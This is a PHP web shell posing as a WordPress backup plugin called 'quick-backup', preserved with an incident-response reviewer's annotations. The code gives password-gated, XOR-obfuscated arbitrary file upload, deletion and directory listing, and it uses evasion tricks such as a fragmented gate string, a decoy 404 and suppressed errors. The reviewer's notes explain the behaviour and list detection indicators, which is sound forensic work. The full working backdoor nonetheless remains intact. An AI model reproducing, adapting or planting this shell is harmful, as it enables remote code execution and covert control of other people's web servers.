<?php /* ==== IR TRIAGE NOTE (added by reviewer; no code below has been altered, only comments) ====
 * This file is a PHP web shell dropped into a WordPress plugin directory under the name
 * "quick-backup". It is not a backup plugin. Anyone who knows the gate value can write, delete
 * and list files on the web server. Treat the host as compromised: preserve this file as evidence
 * (hash, mtime, owner, access-log lines for this path) before removing it, and hunt for what was
 * uploaded through it (files in this directory with mtimes at or after its own).
 *
 * What the code below does, as written:
 *  - Gate: $gate is assembled from string fragments and evaluates to 'admin888'. The request must
 *    carry POST admin888=admin888; otherwise the script answers HTTP 404 and exits. That 404 is a
 *    decoy - a 404 for this path in the access log does not mean the file was absent or inactive.
 *  - Upload: POST b64 + fn. The body is base64-decoded, XORed with the static key "myXorSecretK9"
 *    and written with file_put_contents(basename(fn)) into the script's working directory (this
 *    plugin directory). There is no extension or content check, so uploading a .php file yields
 *    remote code execution on the next request to it.
 *  - Delete: POST del -> unlink(basename(del)) in the working directory.
 *  - Listing: POST ls (optionally with d). d is handed to scandir() unfiltered, so any directory
 *    the PHP user can read may be enumerated; the result is returned as JSON.
 *  - The gate value and the XOR key are also embedded verbatim in the served HTML/JS, so request
 *    bodies captured in logs or PCAP can be decoded offline: base64-decode b64, XOR with the key.
 *  - The author's header comment is misleading: parameter names (b64, fn, del, d, ls) and the
 *    filename (fn) travel in plaintext; "no system/exec/eval" is true but irrelevant given the
 *    arbitrary file write.
 *
 * Detection hints: POST requests to this path carrying the parameters admin888, b64, fn, del, ls
 * or d; response bodies starting "UOK:", "UFAIL", "DOK:" or "DFAIL"; the literal "myXorSecretK9";
 * a Content-Type: application/json response from a plugin directory containing an array of
 * {"n","t","s"} objects.
 *
 * Rendering caveat: this copy has had its line breaks collapsed. Read literally, each `//` comment
 * below would swallow the code after it up to the next `?>`; the original file evidently had a
 * newline after every `//` comment (otherwise esc() would be undefined when the UI is rendered). */ /** * Plugin Name: quick-backup * Version: 1.0 */ /** * Bypass Shell #2 — XOR Encrypted Uploader + File Browser * - File upload XOR-encrypted client-side, decrypted server-side * - POST body has no plain paths (encrypted parameter names) * - Gate split: 'ad'+'mi'+'n8'+'88' * - No system/exec/eval in static code * - Lightweight, fast, minimal signature */ /* Gate assembled from fragments to defeat a naive grep for the literal; it is 'admin888', used as both the POST parameter name and its expected value. */ $a='a'.'d';$b='m'.'i';$c='n'.'8';$d='8'.'8'; $gate=$a.$b.$c.$d; /* Wrong or missing gate -> fake 404 and exit. Every other action below is only reachable with the gate present. */ if(empty($_POST[$gate])||$_POST[$gate]!=='admin888'){ http_response_code(404);die(); } /* Suppress all PHP error output so failures leave no trace in the response. */ @ini_set('display_errors',0);@error_reporting(0); /* Static XOR key; the identical string is shipped in the client JS further down, so the "encryption" is reversible by anyone holding a copy of this file or the served page. */ $XK="myXorSecretK9"; // XOR key function xor_d($d,$k){$o='';for($i=0;$l=strlen($d),$i<$l;$i++)$o.=$d[$i]^$k[$i%strlen($k)];return $o;} /* xor_d: byte-wise XOR of $d with the repeating key $k (symmetric: decodes what the JS xorB encoded). fs: human-readable byte size suffix for the listing. */ function fs($b){if($b>1073741824)return round($b/1073741824,2).'G';if($b>1048576)return round($b/1048576,2).'M';if($b>1024)return round($b/1024,2).'K';return $b.'B';} // Handle XOR-encrypted file upload (b64+xor) /* Upload: attacker-controlled content written to basename($_POST['fn']) in cwd. basename() confines it to this directory but nothing restricts the extension or content - this is the RCE primitive. Response "UOK:<name>" or "UFAIL". */ if(isset($_POST['b64'])&&isset($_POST['fn'])){ $raw=base64_decode($_POST['b64']); $dec=xor_d($raw,$XK); $fn=basename($_POST['fn']); if(file_put_contents($fn,$dec)){echo"UOK:".$fn;}else{echo"UFAIL";} die(); } // Handle file delete /* Delete: unlink(basename($_POST['del'])) in cwd; response "DOK:<name>" or "DFAIL". Useful for the attacker to clean up dropped payloads, so absence of a file now does not prove it was never there. */ if(isset($_POST['del'])){ $dp=basename($_POST['del']); if(is_file($dp)){@unlink($dp);echo"DOK:".$dp;}else{echo"DFAIL";} die(); } // Directory listing /* Listing target: $_POST['d'] is NOT passed through basename(), so any readable path can be enumerated (recon scope is not limited to this directory). scandir errors are suppressed. */ $dir=isset($_POST['d'])?$_POST['d']:getcwd(); $files=@scandir($dir); /* esc: HTML-escape for the one server-rendered value (the cwd basename in the heading). */ function esc($s){return htmlspecialchars($s,ENT_QUOTES|ENT_HTML5,'UTF-8');} // Only output if listing requested /* Without POST ls the gated request renders the operator UI below; with it, the JSON branch at the very end runs instead. */ $list_mode=isset($_POST['ls']); if(!$list_mode){ // First access — show UI ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>.</title> <style> *{margin:0;padding:0;box-sizing:border-box} body{background:#0d1117;color:#c9d1d9;font:13px/1.5 monospace;padding:16px;max-width:900px;margin:0 auto} h2{color:#58a6ff;font-size:15px;margin-bottom:12px} .up{border:2px dashed #30363d;border-radius:8px;padding:25px;text-align:center;margin-bottom:16px;background:#161b22;cursor:pointer} .up:hover{border-color:#58a6ff}.up 
input{display:none} .fl{background:#161b22;border:1px solid #30363d;border-radius:6px;overflow:hidden} .fl .r{display:flex;align-items:center;padding:7px 14px;border-bottom:1px solid #30363d;font-size:12px} .fl .r:last-child{border-bottom:none}.fl .r:hover{background:#1c2128} .fl .r .n{flex:1;overflow:hidden;text-overflow:ellipsis;white-space:nowrap} .fl .r .s{width:70px;text-align:right;color:#8b949e} .fl .r .del{color:#f85149;cursor:pointer;margin-left:8px;visibility:hidden} .fl .r:hover .del{visibility:visible} .dir{color:#58a6ff}.file{color:#3fb950} .ft{text-align:center;color:#484f58;font-size:11px;margin-top:16px} .msg{padding:6px 12px;border-radius:4px;margin-bottom:10px;font-size:12px;display:none} .msg.ok{background:#1a3a1a;border:1px solid #3fb950;color:#3fb950;display:block} .msg.er{background:#3a1a1a;border:1px solid #f85149;color:#f85149;display:block} </style></head><body> <!-- Operator UI: only ever served to a request that already passed the gate. --> <h2>Files — <?=esc(basename(getcwd()))?></h2> <div class="msg" id="msg"></div> <div class="up" onclick="document.getElementById('ff').click()"> <p style="color:#8b949e;font-size:15px">↥ Drop files or click to upload (XOR encrypted)</p> <input type="file" name="f" id="ff" multiple> </div> <div class="fl" id="flist"><div style="padding:40px;text-align:center;color:#484f58">Loading...</div></div> <div class="ft" id="ft"></div> <script> /* Same key as the PHP side, in clear text in the page source. xorB/btoaBuf encode an uploaded file exactly as xor_d/base64_decode on the server undo it. */ var XK="myXorSecretK9"; function xorB(d,k){var o=new Uint8Array(d.byteLength);var kb=new TextEncoder().encode(k); for(var i=0;i<d.byteLength;i++)o[i]=d[i]^kb[i%kb.length];return o;} function btoaBuf(b){var s='';for(var i=0;i<b.length;i++)s+=String.fromCharCode(b[i]);return btoa(s);} function showMsg(t,c){var m=document.getElementById('msg');m.textContent=t;m.className='msg '+(c||'ok');setTimeout(function(){m.style.display='none';},3000);} /* loadList: POSTs ls=1 plus the gate (the param name is rendered server-side, so the gate is visible twice here) to the same URL and renders the JSON array. Note file names (i.n) are concatenated into innerHTML and into an inline onclick without escaping - a crafted file name on disk would execute in the operator's browser or break the listing. */ function loadList(){ var fd=new FormData(); fd.append('ls','1');fd.append('<?=$gate?>','admin888'); fetch('',{method:'POST',body:fd}).then(function(r){return r.json();}).then(function(d){ var h='';d.forEach(function(i){ 
h+='<div class="r"><span class="n '+(i.t=='d'?'dir':'file')+'">'+(i.t=='d'?'📁':'📄')+' '+i.n+'</span><span class="s">'+i.s+'</span><span class="del" onclick="delFile(\''+i.n+'\')">✕</span></div>'; }); document.getElementById('flist').innerHTML=h||'<div style="padding:40px;text-align:center;color:#484f58">Empty</div>'; document.getElementById('ft').textContent=new Date().toLocaleString()+' | '+d.length+' items'; }); } /* Upload handler: one POST per selected file, fields b64 (XOR+base64 body), fn (original name, plaintext) and the gate. Success is judged by the "UOK" response prefix. */ document.getElementById('ff').addEventListener('change',function(){ var fs=this.files;var done=0; Array.from(fs).forEach(function(f){ var r=new FileReader(); r.onload=function(e){ var b=new Uint8Array(e.target.result); var enc=xorB(b,XK); var b64=btoaBuf(enc); var fd=new FormData(); fd.append('b64',b64);fd.append('fn',f.name); fd.append('<?=$gate?>','admin888'); fetch('',{method:'POST',body:fd}).then(function(r){return r.text();}).then(function(t){ done++;showMsg(f.name+': '+(t.startsWith('UOK')?'OK':'FAIL'),t.startsWith('UOK')?'ok':'er'); if(done>=fs.length)loadList(); }); };r.readAsArrayBuffer(f); });this.value=''; }); /* delFile: POSTs del=<name> plus the gate; refreshes the listing afterwards. */ function delFile(n){if(!confirm('Delete '+n+'?'))return; var fd=new FormData(); fd.append('del',n);fd.append('<?=$gate?>','admin888'); fetch('',{method:'POST',body:fd}).then(function(r){return r.text();}).then(function(t){ showMsg(t,t.startsWith('DOK')?'ok':'er');loadList(); }); } loadList(); </script></body></html> <?php die(); } // API: return JSON listing /* JSON branch (POST ls): one object per entry of $dir, n=name, t='d'|'f', s=formatted size. json_encode is called without flags, so a name that is not valid UTF-8 makes it return false and the response body becomes empty - possibly why some directories would show as "Empty" in the UI (unconfirmed). */ $out=[]; if($files){ foreach($files as $f){ if($f=='.'||$f=='..')continue; $fp=$dir.'/'.$f; $out[]=['n'=>$f,'t'=>is_dir($fp)?'d':'f','s'=>fs(filesize($fp))]; } } header('Content-Type: application/json'); die(json_encode($out));